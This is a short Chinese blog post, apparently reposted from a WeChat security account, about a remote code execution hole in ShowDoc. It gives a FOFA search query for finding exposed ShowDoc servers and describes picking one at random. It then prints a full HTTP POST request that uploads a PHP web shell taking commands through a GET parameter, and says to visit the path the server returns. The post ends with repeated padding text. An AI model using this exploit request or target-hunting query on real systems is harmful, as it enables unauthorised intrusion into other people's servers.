ShowDoc 远程代码执行漏洞

  • A+
所属分类:安全漏洞

fofa语句:

app="ShowDoc"

ShowDoc 远程代码执行漏洞

我们随便点一个进去

ShowDoc 远程代码执行漏洞

接着我们使用POC

POST /index.php?s=/home/page/uploadImg HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data; boundary=--------------------------921378126371623762173617Content-Length: 259
----------------------------921378126371623762173617Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"Content-Type: text/plain
<?php echo '123_test';@eval($_GET[cmd])?>----------------------------921378126371623762173617--

ShowDoc 远程代码执行漏洞

response包里有路径,直接访问就行

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

ShowDoc 远程代码执行漏洞

凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数

本文始发于微信公众号(bgbing安全):ShowDoc 远程代码执行漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: